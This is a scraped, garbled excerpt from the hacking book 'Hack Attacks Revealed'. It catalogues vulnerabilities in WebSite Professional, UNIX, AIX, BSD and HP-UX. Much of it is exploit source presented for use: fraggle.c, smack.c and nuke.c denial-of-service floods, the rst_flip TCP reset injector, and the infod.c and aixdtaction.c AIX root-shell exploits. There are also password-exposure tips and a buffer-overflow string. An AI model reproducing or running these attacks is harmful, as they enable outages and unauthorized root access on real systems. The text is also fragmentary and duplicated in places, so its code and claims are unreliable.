Hack Attacks Revealed A Complete Reference with Custom Security Hacking Toolkit phần 7 pot

Operating systems are generally classified according to their host system functions, which may include supercomputers, mainframes, servers, workstations, desktops, and even handheld devi

DUZOA=`perl -e '{ print "A"x4093} '`

O’Reilly WebSite Professional

Rated as one of the fastest-growing personal and corporate Internet server daemons, WebSite Professional (http://website.oreilly.com) is among the most robust Web servers on the market (see Figure 9.10) With custom CGI and Perl support, plus VBScript, JavaScript, Python, and Microsoft ASPA scripting standardization, this suite is unmatched in ease of use and programmability With

Figure 9.10 WebSite Professional administration

this product, an average neophyte could fabricate a standard Web server configuration in minutes

Liabilities

Denial-of-Service Attack

Synopsis: WebSite Professional is vulnerable to a DoS attack that can cause immediate CPU

congestion, resulting in service encumbrance

Hack State: Severe congestion

Vulnerabilities: All revisions

Breach: This DoS penetration attack (fraggle.c) causes an immediate jump to 100 percent system

CPU utilization Multiple DoS attacks cause sustained CPU congestion from 68 to 85 percent, and up

to 100 percent if simultaneously flooded with HTTP requests

void sigint (int);

unsigned short checksum (u_short *, int);

int main (int argc, char *argv[])

{

struct sockaddr_in sin;

struct hostent *he;

struct pktinfo p;

int s, num, delay, n, cycle;

char **bcast = malloc(1024), buf[32];

" [dstport] [srcport] [psize] \n\n"

"target\t\t= address to hit\n"

"bcast file\t= file containing broadcast addrs\n"

"num packets\t= send n packets (n = 0 is constant)\n"

"packet delay\t= usleep() between packets (in ms)\n"

"dstport\t\t= port to hit (default 7)\n"

"srcport\t\t= source port (0 for random)\n" "ps\t\t= packet size\n\n",

/* open bcast file and build array */

if ((bfile = fopen(argv[2], "r")) == NULL)

/* create our raw socket */

if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0)

{

perror("creating raw socket");

srand(time(NULL) * rand() * getpid());

fraggle(s, &sin, inet_addr(bcast[cycle]), &p);

struct iphdr *ip;

struct udphdr *udp;

char *packet;

int r;

packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);

ip = (struct iphdr *)packet;

udp = (struct udphdr *) (packet + sizeof(struct iphdr));

memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);

/* send it on its way */

r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udphdr) +

register int nleft = len;

register u_short *w = addr;

register int sum = 0;

Operating systems are generally classified according to their host system functions, which may include supercomputers, mainframes, servers, workstations, desktops, and even handheld devices The O/S dictates how data is saved to storage devices; it keeps track of filenames, locations, and security, while controlling all connected devices (as shown in Figure 10.1) When a computer is powered on, the operating system automatically loads itself into memory, initializes, and runs other programs In addition, when other programs are running, the O/S continues to operate in the background Popular operating systems include DOS, Microsoft Windows, MacOS, SunOS, and UNIX

Hackers have been exploiting these operating systems since the beginning of their development, so the purpose of this section is to introduce the various hacking techniques used to manipulate them The investigation will include

Figure 10.1 Operating system functionality

AIX, BSD, Digital, HP/UX, IRIX, UNIX, Linux, Macintosh, Windows, OS/2, SCO, Solaris, and VAX/VMS We’ll begin with UNIX

UNIX

There are numerous exploits for every UNIX operating system type, and although extensive testing has not been performed nor documented, some exploits are interchangeable or can be modified for use on different UNIX types Common breach methods against all UNIX flavors include root exploitation, buffer overflow attacks, flooding, and universal port daemon hijacking described earlier

The following list of common deep-rooted commands can be used as a reference for UNIX exploit execution:

alias View current aliases

awk Search for a pattern within a file

bdiff Compare two large files

bfs Scan a large file

ca Show calendar

cat Concatenate and print a file

cc C comp iler

cd Change directory

chgrb Change group ownership

chmod Change file permission

chown Change file ownership

cmp Compare two files

comm Compare common lines between two files

cp Copy file

cu Call another UNIX system

date Show date

df List mounted drives

diff Display difference between two files

du Show disk usage in blocks

echo Echo data to the screen or file

ed Text editor

env List current environment variables

ex Text editor

expr Evaluate mathematical formula

find Find a file

f77 Fortran compiler

format Initialize floppy disk

grep Search for a pattern within a file

help Help

kill Stop a running process

ln Create a link between two files

ls List the files in a directory

mail Send/receive mail

mkdir Make directory

more Display data file

mv Move or rename a file

nohup Continue running a command after logging out nroff Format text

passwd Change password

pkgadd Install a new program

ps Lists the current running processes

pwd Display the name of the working directory

rm Remove file

rmdir Remove directory

set List shell variables

setenv Set environment variables

sleep Pause a process

source Refresh and execute a file

sort Sort files

spell Check for spelling errors

split Divide a file

stty Set terminal options

tail Display the end of a file

tar Compress all specified files into one file

touch Create an empty file

troff Format output

tset Set terminal type

umask Specify new creation mask

uniq Compare two files

uucp UNIX to UNIX copy/execute

vi Full-screen text editor

volcheck Check for mounted floppy

wc Displays detail

who Show current users

write Send a message to another user

! Repeat command

AIX

AIX, by IBM (www.ibm.com), is an integrated flavor of the UNIX operating system that supports 32-bit and 64-bit systems The computers that run AIX include the entire range of RS/6000 systems, from entry- level servers and workstations to powerful supercomputers, such as the RS/6000 SP Interestingly, AIX was the first O/S in its class to achieve independent security evaluations and to support options including C2 and B1 functions (see Part 3 for security class explanations) Also, thanks to new Web-based management sys-

Figure 10.2 Remote AIX network configuration

tems, it is possible to remotely manage AIX systems from anywhere on the Internet, as illustrated in Figure 10.2

Liabilities

Illuminating Passwords

Synopsis: A diagnostic command can unveil passwords out of the shadow—the encoded one-way

hash algorithm

Hack State: Password exposure

Vulnerabilities: AIX 3x/4x +

Breach: When troubleshooting, AIX support teams generally request output from the snap –a

command As a diagnostic tool, this command exports system information (including passwords) into a directory on free drive space With this potential threat, a hacker can target the

/tmp/ib msupt/general/ directory and locate the password file, thus bypassing password shadowing Remote Root

Synopsis: AIX infod daemon has remote root login vulnerabilities

Hack State: Unauthorized root access

Vulnerabilities: AIX 3x/4x

Breach: The Info Explorer module in AIX is used to centralize documentation; as such, it does not

perform any validation on data sent to the local socket that is bounded As a result, hackers can send bogus data to the daemon module, therefore tricking an initiated connection to the intruder’s X display Along with a false environment, by sending a user identification (UID) and group identification (GID) of 0, this daemon should be forced into spawning this connection with root

privileges, as shown in the following program, infod.c, by UNIX guru Arisme

#define NOUSER "Use : infofun [login]"

#define UNKNOWN "User does not exist !"

#define OK "Waiting for magic window …

if you have problems check

fwrite(tempo,1,taille+4,param);

}

main(int argc,char** argv)

{ struct sockaddr_un sin,expediteur;

struct hostent *hp;

struct passwd *info;

int chaussette,taille_expediteur,port,taille_struct,taille_param;

char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;

sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH")); send_environ(buffer,param);

sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME")); send_environ(buffer,param);

sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH")); send_environ(buffer,param);

sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY")); send_environ(buffer,param);

Synopsis: AIX dtaction and home environment handling have remote root shell vulnerabilities

Hack State: Unauthorized root access

Vulnerabilities: AIX 4.2

Breach: With aixdtaction.c by UNIX guru Georgi Guninski, AIX 4.2 /usr/dt/bin/dtaction processes

the ‘‘Home” environment that can spawn a root shell

aixdtaction.c

Use the IBM C compiler

Compile with: cc -g aixdtaction.c

DISPLAY should be set

#include <stdlib.h>

#include <string.h>

char *prog="/usr/dt/bin/dtaction";

char *prog2="dtaction";

extern int execv();

char *createvar(char *name,char *value)

4e800420 bctr jump

*/

#define MAXBUF 600

unsigned int buf[MAXBUF];

unsigned int frame[MAXBUF];

unsigned int i,nop,mn=100;

int max=280;

unsigned int toc;

unsigned int eco;

i=nop+strlen( (char*) &code)/4-1;

if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)

|| !(reta && 0xff000000))

{

perror("Return address has zero");exit(5);

perror("Error executing execve \n");

/* Georgi Guninski guninski@hotmail.com

http://www.geocities.com/ResearchTriangle/1711*/

}

Vulnerabilities: BSD flavors

Breach: The usage is quite simple:

rst_flip <A> <B> <A port low> <A port hi> <B port low> <B port hi> where

A and B are the target current sessions

#define IPHDR sizeof(struct iphdr)

#define PACKETSIZE TCPHDR + IPHDR

#define SLEEPTIME 30000 // depending on how fast can yo

u barf

#define LO_RST 1 // the packets out

#define HI_RST 2147483647 // do not ask me about this :)

#define ERROR_FAILURE -1

#define ERROR_SUCCESS 0

void resolve_address(struct sockaddr *, char *, u_short);

unsigned short in_cksum(unsigned short *,int );

int send_rst(char *, char *, u_short ,u_short , u_long, u_long,u_long);

int main(int argc, char *argv[])

printf ("usage: <source> <destination> <source_port_hi>

<source_port_lo> <dest_port_hi> <dest_port_lo>\n[

// here we put it together

int send_rst(char *fromhost, char *tohost, u_short fromport,u_short toport, u_long ack_sq, u_long s_seq, u_long spoof_id)

unsigned char placeholder;

unsigned char protocol;

unsigned short tcp_length;

tpack.tcp.ack_seq=ntohl(ack_sq); //

32-bit Acknowledgement Number */

tpack.tcp.doff=5; // Data offset */

tpack.tcp.rst=1; // Reset flag */

tpack.tcp.syn=0; // Synchronize sequence numbers flag */ tpack.tcp.fin=0; // Finish sending flag */

16-bit Total length */

tpack.ip.id=htons(spoof_id); // 16-bit ID field */ tpack.ip.frag_off=0; // 13-

bit Fragment offset */

tpack.ip.ttl=64; //

8-bit Time To Live */

tpack.ip.protocol=IPPROTO_TCP; // 8-bit Protocol */ tpack.ip.check=0; // 16-

bit Header checksum (filled in below) */

tpack.ip.saddr=local_sin.sin_addr.s_addr; // 32-bit Source Address */ tpack.ip.daddr=remote_sin.sin_addr.s_addr; // 32-

bit Destination

Address */

// IP header checksum

tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);

sum += (sum >> 16); // add carry

answer = ~sum; //

ones-complement, then truncate to 16 bits

return(answer);

}

// Resolve the address and populate the sin structs

void resolve_address(struct sockaddr * addr, char *hostname, u_shor

t port)

{

struct sockaddr_in *address;

struct hostent *host;

address = (struct sockaddr_in *)addr;

(void) bzero( (char *)address, sizeof(struct sockaddr_in) );

Breach: This DoS attack, modified by Iron Lungs, results in platform freezes, as the victim receives

thousands of packets from the customizable addresses between the */Start and End customizing sections

97,105,109,92,48,92,109,115,103,92,49,92,114,97,116,

101,92,50,53,48,48,92,98,111,116,116,111,109,99,111,

108,111,114,92,49,98,92,116,111,112,99,111,108,111,114,

92,110,97,109,101,92,83,110,111,111,112,121,34,10

int addserv(char *, unsigned int, char);

void main(int argc, char *argv[])

{

iph = (struct ip *)pack;

udph = (struct udphdr *)(iph + 1);

if (argc < 2) {

printf("Usage: /smack <target to fuck>\n", argv[0]); exit(-1);

char ip[16], tmp[6], mode, tmp2;

unsigned int port;

bzero(ip, 16); bzero(tmp, 6); mode = 0; port = 0; n = 0; c = 0; m = 0;

memcpy(udph + 1, conn_pack1, strlen(conn_pack1));

ret = sendto(s, pack, PS1, 0, (struct sockaddr *)&addr,

• 64-bit power Runs larger applications, and processes large data sets faster

• Industry’s leading performance Achieved via V-Class and N-Class servers

• Broadest application portfolio Cost-effectively delivers leading packaged application

software

• Easy upgrades Enables unmodified use of 9.x or 10.x applications (also runs 32-bit and

64-bit side by side)

• Widely supported Is compatible with the full line of HP 9000 Enterprise servers

• Superior scalability Simplifies the move from 1- to 128-way computing within the same

system

• Improved resilience Maximizes uptime

• Top security Secures applications ranging from communications to business transactions

• Ready for e-services Supports HP’s Internet e-commerce strategy

• Ready for IA-64 Binary compatibility smoothes transition to the next- generation IA-64

architecture

• Promising future Backed by the resources and expertise of HP

Liabilities

Denial-of-Service Attack

Synopsis: DoS attack that can potentially terminate an IP connection

Hack State: Severe congestion

Vulnerabilities: All flavors

Breach: Nuke.c, by renown super hacker Satanic Mechanic, is a DoS attack that can kill almost any

IP connection using ICMP- unreachable messages

register int nleft = len;

register u_short *w = addr;

register int sum = 0;

u_short answer = 0;

/*

* Our algorithm is simple, using a

32-bit accumulator (sum),

* we add sequential

16-bit words to it, and at the end, fold

* back all the carry bits from the top 16 bits into the lower

sum += (sum >> 16); /* add carry */

answer = ~sum; /* truncate to 16 bit

struct sockaddr_in name;

struct sockaddr dest,uspoof;

char *buf = (char *) malloc(sizeof(struct icmp)+64);

mp = (struct icmp *) buf;

if (resolve_host(host,&dest) <0) return(-1);

if (resolve_host(uhost,&uspoof) <0) return(-1);

if ((proto = getprotobyname("icmp")) == NULL) {

fputs("unable to determine protocol number of \"icmp\n",stderr);

/* Bind it to the port */

rc = bind(s, (struct sockaddr *) & name, sizeof(name));

if (rc == -1) {

perror("bind");

return(-1);

}

if ((proto = getprotobyname("tcp")) == NULL) {

fputs("unable to determine protocol number of \"icmp\n",std

mp->icmp_cksum = htons(in_cksum(mp,sizeof(struct icmp)+64));

if ((i= sendto(s,buf,sizeof(struct icmp)+64, 0,&dest,sizeof(dest)))

if (argc == 4) type = DEFAULT_UNREACH;

else type = resolve_unreach_type(argv[4]);

if ((type <0) ||(type >MAX_ICMP_UNREACH)) {

fputs("invalid unreachable type",stderr);

exit(1);

}

if (icmp_unreach(argv[1],argv[2],atoi(argv[3]),type) <0) exit(1);

exit(0);

}

Denial-of-Service Attack

Synopsis: As explained earlier in this chapter, smack.c is a DoS attack that sends random

ICMP-unreachable packets from customized random IP addresses

Vulnerabilities: All

Breach: This DoS attack was designed as a connection-killer because the victim receives an

abundance of packets from the addresses inserted between the */ Insert and End sections

101,92,50,53,48,48,92,98,111,116,116,111,109,99,111,

108,111,114,92,49,98,92,116,111,112,99,111,108,111,114,

92,110,97,109,101,92,83,110,111,111,112,121,34,10 };

int addserv(char *, unsigned int, char);

void main(int argc, char *argv[])

{

iph = (struct ip *)pack;

udph = (struct udphdr *)(iph + 1);

char ip[16], tmp[6], mode, tmp2;

unsigned int port;

bzero(ip, 16); bzero(tmp, 6); mode = 0; port = 0; n = 0; c = 0; m = 0;

tmp2 = 0;

for (i = 0; i < strlen(in); i++) {

if (in[i] != ' ') {

if (in[i] != ':') {